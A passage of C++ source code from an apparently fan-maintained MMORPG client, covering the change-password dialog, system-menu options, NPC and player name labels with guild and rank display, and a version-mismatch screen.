		ZeroMemory(cNewPassConfirm, sizeof(cNewPassConfirm));

		strcpy( cName, m_cAccountName );
		StartInputString(314 + SCREENX, 179 + SCREENY, 11, cPassword);
		ClearInputString();
		dwCTime = dwTime;
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if ((dwTime - dwCTime) > 100) {
		m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) {
		case 1:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;

		case 2:
			if (m_cCurFocus == 3) m_cCurFocus = 4;
			else if (m_cCurFocus == 4) m_cCurFocus = 3;
			break;

		case 3:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;

		case 4:
			if (m_cCurFocus == 3) m_cCurFocus = 4;
			else if (m_cCurFocus == 4) m_cCurFocus = 3;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (m_bEnterPressed == TRUE)
	{	PlaySound('E', 14, 5);
		switch (m_cCurFocus) {
		case 1:
		case 2:
		case 3:
		case 4:
			m_cCurFocus++;
			if( m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;

		case 5:	// Connect
			if ( (m_Misc.bCheckValidString(cPassword) == FALSE) || (strlen(cPassword) == 0) ||
				 (m_Misc.bCheckValidName(cNewPassword) == FALSE) || (m_Misc.bCheckValidName(cNewPassConfirm) == FALSE) ||
				 (strlen(cNewPassword) == 0) || (memcmp(cNewPassword, cNewPassConfirm, 10) != 0) ) break; 

			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));
			ZeroMemory(m_cNewPassword, sizeof(m_cNewPassword));
			ZeroMemory(m_cNewPassConfirm, sizeof(m_cNewPassConfirm));
			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);
			strcpy(m_cNewPassword, cNewPassword);
			strcpy(m_cNewPassConfirm, cNewPassConfirm);
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
            GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_CHANGEPASSWORD;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "41");
			delete pMI;
			return;

		case 6:	// Cancel
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			delete pMI;
			return;
		}
		m_bEnterPressed = FALSE;
	}

	if (m_bEscPressed == TRUE)
	{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	if (cPrevFocus != m_cCurFocus)
	{	EndInputString();
		switch (m_cCurFocus) {
		
		case 1:
			StartInputString(314 + SCREENX, 155 + SCREENY, 11, cName);
			break;
		case 2:
			StartInputString(314 + SCREENX, 179 + SCREENY, 11, cPassword);
			break;
		case 3:
			StartInputString(314 + SCREENX, 203 + SCREENY, 11, cNewPassword);
			break;
		case 4:
			StartInputString(314 + SCREENX, 227 + SCREENY, 11, cNewPassConfirm);
			break;
		}
		cPrevFocus = m_cCurFocus;
	}

	m_DDraw.ClearBackB4();

	UpdateScreen_OnSelectCharacter(0, 0, 0, 0, TRUE);
#ifdef RES_HIGH
	m_DDraw.DrawShadowBox(0,0, 800, 600);
#else
	m_DDraw.DrawShadowBox(0,0,639,479);//SelectCharacter
#endif

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 153+ SCREENX, 112 + SCREENY, 0);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_TEXT , 153 + SCREENX, 112 + SCREENY, 13);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 153 + 157 + SCREENX, 112 + 109 + SCREENY, 7);//

	PutString(206 + SCREENX, 155 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD1, RGB(25,35,25));
	PutString(206 + SCREENX, 179 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD2, RGB(25,35,25));
	PutString(206 + SCREENX, 203 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD3, RGB(25,35,25));
	PutString(206 + SCREENX, 227 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD4, RGB(25,35,25));

	if (m_cCurFocus != 1) {
		if (m_Misc.bCheckValidString(cName) != FALSE)
			 PutString(314 + SCREENX, 155 + SCREENY, cName, RGB(25,35,25));
		else PutString(314 + SCREENX, 155 + SCREENY, cName, RGB(55,18,13));
	}
	if ((m_Misc.bCheckValidString(cName) == FALSE) || (strlen(cName) == 0)) bFlag = FALSE;

	if (m_cCurFocus != 2) {
		if ((m_Misc.bCheckValidString(cPassword) != FALSE))
			 PutString(314 + SCREENX, 179 + SCREENY, cPassword, RGB(25,35,25), TRUE, 3);
		else PutString(314 + SCREENX, 179 + SCREENY, cPassword, RGB(55,18,13), TRUE, 3);
	}

	if (m_cCurFocus != 3) {
		if ((m_Misc.bCheckValidName(cNewPassword) != FALSE))
			 PutString(314 + SCREENX, 203 + SCREENY, cNewPassword, RGB(25,35,25), TRUE, 3);
		else PutString(314 + SCREENX, 203 + SCREENY, cNewPassword, RGB(55,18,13), TRUE, 3);
	}

	if (m_cCurFocus != 4) {
		if ((m_Misc.bCheckValidName(cNewPassConfirm) != FALSE))
			 PutString(314 + SCREENX, 227 + SCREENY, cNewPassConfirm, RGB(25,35,25), TRUE, 3);
		else PutString(314 + SCREENX, 227 + SCREENY, cNewPassConfirm, RGB(55,18,13), TRUE, 3);
	}

	if ( (m_Misc.bCheckValidString(cPassword) == FALSE) || (strlen(cPassword) == 0) ||
		 (strlen(cNewPassword) < 8) || (memcmp(cNewPassword, cNewPassConfirm, 10) != 0) ||
		 ( memcmp(cPassword, cNewPassword, 10) == 0 ) ) bFlag = FALSE;


	if (m_cCurFocus == 1) ShowReceivedString();
	else if ((m_cCurFocus == 2) || (m_cCurFocus == 3) || (m_cCurFocus == 4)) ShowReceivedString(TRUE);

	PutAlignedString(153 + SCREENX, 487 + SCREENX, 258 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD5);//"
	PutAlignedString(153 + SCREENX, 487 + SCREENX, 273 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD6);//"
	PutAlignedString(153 + SCREENX, 487 + SCREENX, 288 + SCREENY, UPDATE_SCREEN_ON_CHANGE_PASSWORD7);//"

	if ( (bFlag == TRUE) && (m_cCurFocus == 5) )
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(197 + SCREENX, 320 + SCREENY, 21, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(197 + SCREENX, 320 + SCREENY, 20, dwTime);

	if (m_cCurFocus == 6)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(370 + SCREENX, 320 + SCREENY, 17, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(370 + SCREENX, 320 + SCREENY, 16, dwTime);

	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK)
	{	PlaySound('E', 14, 5);

		switch (iMIbuttonNum) {
		case 1:
		case 2:
		case 3:
		case 4:
			m_cCurFocus = iMIbuttonNum;
			break;

		case 5:
			if ( (m_Misc.bCheckValidString(cPassword) == FALSE) || (strlen(cPassword) == 0) ||
				 (m_Misc.bCheckValidName(cNewPassword) == FALSE) || (m_Misc.bCheckValidName(cNewPassConfirm) == FALSE) ||
				 (strlen(cNewPassword) == 0) || (memcmp(cNewPassword, cNewPassConfirm, 10) != 0) ) break;

			EndInputString();
			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));
			ZeroMemory(m_cNewPassword, sizeof(m_cNewPassword));
			ZeroMemory(m_cNewPassConfirm, sizeof(m_cNewPassConfirm));
			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);
			strcpy(m_cNewPassword, cNewPassword);
			strcpy(m_cNewPassConfirm, cNewPassConfirm);
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
            GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_CHANGEPASSWORD;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "41");
			delete pMI;
			return;

		case 6:
			// Cancel
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			delete pMI;
			return;
		}
	}

	if ((msX >= 197 + SCREENX) && (msX <= 197 + DEF_BTNSZX + SCREENX) && (msY >= 320 + SCREENY) && (msY <= 320 + DEF_BTNSZY + SCREENY)) m_cCurFocus = 5;
	if ((msX >= 370 + SCREENX) && (msX <= 370 + DEF_BTNSZX + SCREENX) && (msY >= 320 + SCREENY) && (msY <= 320 + DEF_BTNSZY + SCREENY)) m_cCurFocus = 6;

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::DlgBoxClick_SysMenu(short msX, short msY)
{ short sX, sY;
	sX = m_stDialogBoxInfo[19].sX;
	sY = m_stDialogBoxInfo[19].sY;
	if ((msX >= sX + 120) && (msX <= sX + 150) && (msY >= sY + 63) && (msY <= sY + 74))
	{	m_cDetailLevel = 0; // v1.41
		AddEventList( NOTIFY_MSG_DETAIL_LEVEL_LOW, 10 );
		PlaySound('E', 14, 5);
   	}

	if ((msX >= sX + 151) && (msX <= sX + 200) && (msY >= sY + 63) && (msY <= sY + 74))
	{	m_cDetailLevel = 1;
		AddEventList( NOTIFY_MSG_DETAIL_LEVEL_MEDIUM, 10 );
		PlaySound('E', 14, 5);
	}

	if ((msX >= sX + 201) && (msX <= sX + 234) && (msY >= sY + 63) && (msY <= sY + 74))
	{	m_cDetailLevel = 2;
		AddEventList( NOTIFY_MSG_DETAIL_LEVEL_HIGH, 10 );
		PlaySound('E', 14, 5);
	}

	if ((msX >= sX + 24) && (msX <= sX + 115) && (msY >= sY + 81) && (msY <= sY + 100))
	{	if( m_bSoundFlag )
		{	if (m_bSoundStat == TRUE)
			{	m_pESound[38]->bStop();
				m_bSoundStat = FALSE;
				AddEventList( NOTIFY_MSG_SOUND_OFF, 10 );
			}else
			{	m_bSoundStat = TRUE;
				AddEventList( NOTIFY_MSG_SOUND_ON, 10 );
	}	}	}

	if ((msX >= sX + 116) && (msX <= sX + 202) && (msY >= sY + 81) && (msY <= sY + 100))
	{	if( m_bSoundFlag )
		{	if (m_bMusicStat == TRUE) 	// Music Off
			{	m_bMusicStat = FALSE;
				AddEventList( NOTIFY_MSG_MUSIC_OFF, 10 );
				if (m_bSoundFlag)
				{	StopBGM();	// Snoopy: mp3 support
					if (m_pBGM != NULL)
					{	m_pBGM->bStop();
						delete m_pBGM;
						m_pBGM = NULL;
				}	}
			}else // Music On
			{	if (m_bSoundFlag)
				{	m_bMusicStat = TRUE;
					AddEventList( NOTIFY_MSG_MUSIC_ON, 10 );
					StartBGM();
	}	}	}	}


	if ((msX >= sX + 23) && (msX <= sX + 108) && (msY >= sY + 108) && (msY <= sY + 119))
	{	if (m_bWhisper == TRUE)
		{	m_bWhisper = FALSE;
			AddEventList(BCHECK_LOCAL_CHAT_COMMAND7, 10 );
		}else
		{	m_bWhisper = TRUE;
			AddEventList(BCHECK_LOCAL_CHAT_COMMAND6, 10 );
	}	}

	if ((msX >= sX + 123) && (msX <= sX + 203) && (msY >= sY + 108) && (msY <= sY + 119))
	{	if (m_bShout == TRUE)
		{	m_bShout = FALSE;
			AddEventList(BCHECK_LOCAL_CHAT_COMMAND9, 10 );
		}else
		{	m_bShout = TRUE;
			AddEventList(BCHECK_LOCAL_CHAT_COMMAND8, 10 );
	}	}

	//Grid - by luqah
    if ((msX >= sX  + 136) && (msX <= sX + 238) && (msY >= sY + 178) && (msY <= sY + 193))
    {	if( m_bGrid ){
			m_bGrid = FALSE;
		}
        else {
			m_bGrid = TRUE;
			//Grid - by luqah
			SetTopMsg("Please, move to display the grid.", 10);
		}
    }

	//Transparency Change
	if ((msX >= sX + 28) && (msX <= sX + 235) && (msY >= sY + 156) && (msY <= sY + 171)) m_bDialogTrans = !m_bDialogTrans;

	//Guide Map Toggle
	if ((msX >= sX + 28) && (msX <= sX + 127) && (msY >= sY + 178) && (msY <= sY + 193))
	{	if( m_bIsDialogEnabled[9] ) DisableDialogBox(9);
		else EnableDialogBox(9, 0, 0, 0, NULL);
	}

	if (m_bForceDisconn) return;
	if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + 225) && (msY <= sY + 225 + DEF_BTNSZY)) {
		if( m_cLogOutCount == -1 )

#ifdef _DEBUG
			m_cLogOutCount = 1;
#else
			m_cLogOutCount = 11;
#endif
		else {
			m_cLogOutCount = -1;
			AddEventList(DLGBOX_CLICK_SYSMENU2, 10);
			DisableDialogBox(19);
		}
		PlaySound('E', 14, 5);
	}

	if ((m_iHP <= 0) && (m_cRestartCount == -1))
	{	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + 225) && (msY <= sY + 225 + DEF_BTNSZY))
		{	m_cRestartCount = 5;
			m_dwRestartCountTime = timeGetTime();
			DisableDialogBox(19);
			wsprintf(G_cTxt, DLGBOX_CLICK_SYSMENU1, m_cRestartCount); // "Restarting game....%d"
			AddEventList(G_cTxt, 10);
			PlaySound('E', 14, 5);
	}	}
}

void CGame::DrawNpcName(short sX, short sY, short sOwnerType, int iStatus)
{	char cTxt[32], cTxt2[64];
	ZeroMemory(cTxt, sizeof(cTxt));
	ZeroMemory(cTxt2, sizeof(cTxt2));
	GetNpcName(sOwnerType, cTxt);
	if ((iStatus & 0x20) != 0) strcat(cTxt, DRAW_OBJECT_NAME50);//" Berserk"
	if ((iStatus & 0x40) != 0) strcat(cTxt, DRAW_OBJECT_NAME51);//" Frozen"
	PutString2(sX, sY, cTxt, 255,255,255);
	if (m_bIsObserverMode == TRUE) PutString2(sX, sY+14, cTxt, 50,50,255);
	else if (m_bIsConfusion || (m_iIlusionOwnerH != NULL))
	{	ZeroMemory(cTxt, sizeof(cTxt));
		strcpy(cTxt, DRAW_OBJECT_NAME87);//"(Unknown)"
		PutString2(sX, sY+14, cTxt, 150,150,150); // v2.171
	}

	switch ((iStatus & 0x0F00) >> 8) {
		case 0: break;
		case 1: strcpy(cTxt2, DRAW_OBJECT_NAME52); break;//"Clairvoyant"
		case 2: strcpy(cTxt2, DRAW_OBJECT_NAME53); break;//"Destruction of Magic Protection"
		case 3: strcpy(cTxt2, DRAW_OBJECT_NAME54); break;//"Anti-Physical Damage"
		case 4: strcpy(cTxt2, DRAW_OBJECT_NAME55); break;//"Anti-Magic Damage"
		case 5: strcpy(cTxt2, DRAW_OBJECT_NAME56); break;//"Poisonous"
		case 6: strcpy(cTxt2, DRAW_OBJECT_NAME57); break;//"Critical Poisonous"
		case 7: strcpy(cTxt2, DRAW_OBJECT_NAME58); break;//"Explosive"
		case 8: strcpy(cTxt2, DRAW_OBJECT_NAME59); break;//"Critical Explosive"
	}
	if( m_Misc.bCheckIMEString(cTxt2) ) PutString_SprFont3(sX, sY + 22, cTxt2, m_wR[13]*4, m_wG[13]*4, m_wB[13]*4, FALSE, 2);
	else PutString2(sX, sY + 28, cTxt2, 240,240,70);

	// centu: no muestra la barra de hp de algunos npc
	switch (sOwnerType) {
	case 15: 
	case 19: 
	case 20: 
	case 24: 
	case 25: 
	case 26: 
	case 42:
	case 55:
	case 56:
	case 67: 
	case 68: 
	case 69: 
	case 64:
		{	
			switch((_tmp_sAppr2 & 0xFF00)>>8)	{
			case 1:	
			case 2: 
			case 3: 
			case 4: 
			case 5:	
			case 6: 
			case 7: 
			case 8: 
			case 9: 
			case 10: 
			case 11: 
			case 12: 
			case 13: 
			case 14: 
			default: 
				break;
			}
		}
	case 90:
		break;
	default:
		//50Cent - HP Bar 
		//Centuu - fixed
		bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_GETNPCHP, NULL, _tmp_wObjectID, NULL, NULL, NULL);
		if(iNpcHP > 0)
		{
			m_pSprite[DEF_SPRID_INTERFACE_ND_PARTYSTATUS]->PutSpriteFastWidth(sX, sY + 15, 18, 75, m_dwCurTime, false);
			int iBarWidth2 = (iNpcHP*75)/iNpcMaxHP;
			if( iBarWidth2 < 0 ) iBarWidth2 = 0;
			if( iBarWidth2 > 75 ) iBarWidth2 = 75;
			m_pSprite[DEF_SPRID_INTERFACE_ND_PARTYSTATUS]->PutSpriteFastWidth(sX, sY + 15,  19, iBarWidth2, m_dwCurTime, false); // 16
		}
		break;
	}

}

void CGame::DrawObjectName(short sX, short sY, char * pName, int iStatus)
{	char cTxt[64], cTxt2[64], cTxt6[64];
	short sR, sG, sB;
	int i, iGuildIndex, iFOE, iAddY=0;
	BOOL bPK, bCitizen, bAresden, bHunter, bGM;
	DWORD dwTime = timeGetTime();
	iFOE = _iGetFOE(iStatus);
	if( iFOE < 0 )
	{	sR = 255; sG = 0; sB = 0;
	}else if( iFOE == 0 )
	{	sR = 50; sG = 50; sB = 255;
	}else
	{	sR = 30; sG = 200; sB = 30;
	}
	ZeroMemory(cTxt, sizeof(cTxt));
	ZeroMemory(cTxt2, sizeof(cTxt2));

	if (m_iIlusionOwnerH == NULL)
	{	if (m_bIsCrusadeMode == FALSE) wsprintf(cTxt, "%s", pName);
		else
		{	if (_tmp_wObjectID >= 10000) strcpy(cTxt, NPC_NAME_MERCENARY); //"Mercenary"
			else
			{	if( iFOE == -1 ) wsprintf(cTxt, "%d", _tmp_wObjectID);
				else strcpy(cTxt, pName);
		}	}
		if (m_iPartyStatus != NULL)
		{	for (i = 0; i < DEF_MAXPARTYMEMBERS; i++)
			{	if (strcmp(m_stPartyMemberNameList[i].cName, pName) == 0)
				{	strcat(cTxt, " (Party Member)"); // ", Party Member"
					break;
		}	}	}
	}else strcpy(cTxt, "?????");

	if ((iStatus & 0x20) != 0) strcat(cTxt, " (Berserked)");//" Berserk"
	if ((iStatus & 0x40) != 0) strcat(cTxt, " (Frozen)");//" Frozen"

	PutString2(sX, sY, cTxt, 255,255,255);
	ZeroMemory(cTxt, sizeof(cTxt));

	// centu - deathmatch show only enemies
	if ((strcmp(m_cMapName, "fightzone1") == 0) && (bDeathmatch) && ( memcmp(pName, m_cPlayerName, 12) != 0 ))
	{
		strcpy(cTxt, DRAW_OBJECT_NAME90);
		PutString2(sX, sY+14, cTxt, 255, 0, 0);
	}
	else {
		if( memcmp(m_cPlayerName, pName, 10) == 0 )
		{	if( m_iGuildRank == 0 )
			{	wsprintf( G_cTxt, DEF_MSG_GUILDMASTER, m_cGuildName );//" Guildmaster)"
				PutString2(sX, sY+14, G_cTxt, 180,180,180);
				iAddY = 14;
			}
			else if( m_iGuildRank > 0 )
			{	wsprintf( G_cTxt, DEF_MSG_GUILDSMAN, m_cGuildName );//" Guildsman)"
				PutString2(sX, sY+14, G_cTxt, 180,180,180);
				iAddY = 14;
			}

			if( m_iPKCount != 0 )
			{	bPK = TRUE;
				sR = 255; sG = 0; sB = 0;
			}else
			{	bPK = FALSE;
				sR = 30; sG = 200; sB = 30;
			}

			bCitizen = m_bCitizen;
			bAresden = m_bAresden;
			bHunter = m_bHunter;
		}else
		{	// CLEROTH - CRASH BUG ( STATUS )
			if( iStatus & 0x80000000 ) bPK = TRUE;
			else bPK = FALSE;
			if( iStatus & 0x40000000 ) bCitizen = TRUE;
			else bCitizen = FALSE;
			if( iStatus & 0x20000000 ) bAresden = TRUE;
			else bAresden = FALSE;
			if( iStatus & 0x10000000 ) bHunter = TRUE;
			else bHunter = FALSE;
			if( m_bIsCrusadeMode==FALSE || iFOE>=0 )
			{	if( FindGuildName(pName, &iGuildIndex) == TRUE )
				{	if (m_stGuildName[iGuildIndex].cGuildName[0] != NULL)
					{	if( strcmp(m_stGuildName[iGuildIndex].cGuildName, "NONE" )!=0 )
						{	if( m_stGuildName[iGuildIndex].iGuildRank == 0 )
							{	wsprintf( G_cTxt, DEF_MSG_GUILDMASTER, m_stGuildName[iGuildIndex].cGuildName );//
								
							}else if( m_stGuildName[iGuildIndex].iGuildRank > 0 )
							{	wsprintf( G_cTxt, DEF_MSG_GUILDSMAN, m_stGuildName[iGuildIndex].cGuildName );//"
								
							}
							PutString2(sX, sY + 14, G_cTxt, 180, 180, 180);
							m_stGuildName[iGuildIndex].dwRefTime = m_dwCurTime;
							iAddY += 14;
						}else
						{	m_stGuildName[iGuildIndex].dwRefTime = 0;
					}	}
				}else bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQGUILDNAME, NULL, _tmp_wObjectID, iGuildIndex, NULL, NULL);
		}	}
		if ( memcmp(pName, m_cRango, 10) != 0 )
		{
			m_iRango_EK = 0;
			m_iRango_REP = 0;
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQRANGO, NULL, _tmp_wObjectID, NULL, NULL, NULL); // MORLA2.2 - Pregunta EK y REP del player
			ZeroMemory(m_cRango, sizeof(m_cRango)); 
			memcpy (m_cRango, pName, 10);
		}
		else
		{
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQRANGO, NULL, _tmp_wObjectID, NULL, NULL, NULL); // MORLA2.2 - Pregunta EK y REP del player
		}
		if ( bCitizen == FALSE )	
			strcpy(cTxt, DRAW_OBJECT_NAME60);// "Traveller"
		else
		{	if( bAresden )
			{	if( bHunter == TRUE ) 
					strcpy(cTxt, DEF_MSG_ARECIVIL); // "Aresden Civilian"
				else 
					strcpy(cTxt, DEF_MSG_ARESOLDIER);
		
			}else
			{	if( bHunter == TRUE ) 
					strcpy(cTxt, DEF_MSG_ELVCIVIL);// "Elvine Civilian"
				else 
					strcpy(cTxt, DEF_MSG_ELVSOLDIER);	// "Elvine Combatant"	
			}		
		}
		if( bPK == TRUE )
		{	if( bCitizen == FALSE ) 
				strcpy( cTxt, DEF_MSG_PK );	//"Criminal"
			else
			{	if( bAresden ) 
					strcpy( cTxt, DEF_MSG_AREPK );// "Aresden Criminal"
				else 
					strcpy( cTxt, DEF_MSG_ELVPK );  // "Elvine Criminal"
		}	}		
		
		PutString2(sX, sY+14 +iAddY, cTxt, sR, sG, sB);

		//MORLA 2.2 - Determina el rango del pj
		if((m_iRango_EK >= 100) && (m_iRango_REP >=20 ))
		{
			if(((m_iRango_EK >= 100) && (m_iRango_REP < 30 )) || ((m_iRango_EK < 200) && (m_iRango_REP >= 20 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK1);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 32, dwTime); //105,32
			}				
			else if(((m_iRango_EK >= 200) && (m_iRango_REP < 40 )) || ((m_iRango_EK < 300) && (m_iRango_REP >= 30 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK2);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 33, dwTime);
			}
			else if(((m_iRango_EK >= 300) && (m_iRango_REP < 50 )) || ((m_iRango_EK < 400) && (m_iRango_REP >= 40 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK3);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 34, dwTime);
			}
			else if(((m_iRango_EK >= 400) && (m_iRango_REP < 60 )) || ((m_iRango_EK < 500) && (m_iRango_REP >= 50 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK4);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 36, dwTime);
			}
			else if(((m_iRango_EK >= 500) && (m_iRango_REP < 70 )) || ((m_iRango_EK < 600) && (m_iRango_REP >= 60 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK5);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 35, dwTime);
			}
			else if(((m_iRango_EK >= 600) && (m_iRango_REP < 80 )) || ((m_iRango_EK < 700) && (m_iRango_REP >= 70 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK6);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 29, dwTime);
			}
			else if(((m_iRango_EK >= 700) && (m_iRango_REP < 90 )) || ((m_iRango_EK < 800) && (m_iRango_REP >= 80 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK7);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 30, dwTime);
			}
			else if(((m_iRango_EK >= 800) && (m_iRango_REP < 100 )) || ((m_iRango_EK < 900) && (m_iRango_REP >= 90 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK8);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 31, dwTime);
			}
			else if(((m_iRango_EK >= 900) && (m_iRango_REP < 200 )) || ((m_iRango_EK < 1000) && (m_iRango_REP >= 100 )))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK9);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 37, dwTime);
			}
			else if( (m_iRango_EK >= 1000) &&  (m_iRango_REP >= 200 ))
			{	
				strcpy(cTxt, DEF_MSG_RANGOEK10);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(sX-50, sY, 38, dwTime);
			}
			PutString2(sX, sY+28 +iAddY, cTxt, 255, 255, 0);
			iAddY += 14;
		}

		// Wanted System
		if (m_iWantedLevel > 0)
		{
			wsprintf(cTxt6, "Wanted (Lv. %d)", m_iWantedLevel);
			PutString2(sX, sY + 28 + iAddY, cTxt6, 49, 203, 253);
		}
	}

	//50Cent - GM Effect sin shield
	if (((memcmp(pName, "GM1", 3) == 0) && (strlen(pName) == strlen("GM1"))))
	{
		m_pEffectSpr[45]->PutTransSprite(sX - 13, sY - 34, 0, m_dwCurTime);
	}

}

BOOL CGame::FindGuildName(char* pName, int* ipIndex)
{
	int i, iRet = 0;
	DWORD dwTmpTime;
	for( i=0 ; i < DEF_MAXGUILDNAMES ; i++ )
	{
		if( memcmp(m_stGuildName[i].cCharName, pName, 10) == 0 )
		{
			m_stGuildName[i].dwRefTime = m_dwCurTime;
			*ipIndex = i;
			return TRUE;
		}
	}
	dwTmpTime = m_stGuildName[0].dwRefTime;
	for( i=0 ; i < DEF_MAXGUILDNAMES ; i++ )
	{
		if( m_stGuildName[i].dwRefTime < dwTmpTime )
		{
			iRet = i;
			dwTmpTime = m_stGuildName[i].dwRefTime;
		}
	}
	ZeroMemory( m_stGuildName[iRet].cGuildName, sizeof(m_stGuildName[iRet].cGuildName) );
	memcpy( m_stGuildName[iRet].cCharName, pName, 10 );
	m_stGuildName[iRet].dwRefTime = m_dwCurTime;
	m_stGuildName[iRet].iGuildRank = -1;
	*ipIndex = iRet;
	return FALSE;
}

void CGame::UpdateScreen_OnVersionNotMatch()
{short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 DWORD dwTime = timeGetTime();
	if (m_cGameModeCount == 0)
	{	if (G_pCalcSocket != NULL)
		{	delete G_pCalcSocket;
			G_pCalcSocket = NULL;
		}
		if (m_pGSock != NULL)
		{	delete m_pGSock;
			m_pGSock = NULL;
		}
		pMI = new class CMouseInterface;
#ifdef RES_HIGH
		pMI->AddRect(0,0,800,600);
#else
		pMI->AddRect(0,0,640,480);
#endif
		m_bEnterPressed = FALSE;
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 120) m_cGameModeCount = 120;
	m_DDraw.ClearBackB4();
	if (m_bEscPressed == TRUE || m_bEnterPressed == TRUE)
	{	m_bEscPressed = FALSE;
		m_bEnterPressed = FALSE;
		delete pMI;
		ChangeGameMode(DEF_GAMEMODE_NULL);
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		return;
	}
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_QUIT, 0,0,0, TRUE);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162,125,2);
	PutAlignedString(168, 474, 160, UPDATE_SCREEN_ON_VERSION_NO_MATCH1);
	PutAlignedString(168, 474, 180, UPDATE_SCREEN_ON_VERSION_NO_MATCH2);
	
	DrawVersion();
